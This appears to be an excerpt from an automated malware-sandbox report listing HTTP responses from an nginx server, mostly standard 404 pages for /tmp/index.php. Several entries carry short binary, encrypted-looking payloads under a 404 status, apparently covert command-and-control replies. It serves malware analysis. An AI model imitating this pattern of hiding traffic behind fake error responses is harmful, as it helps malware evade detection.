Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:54:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
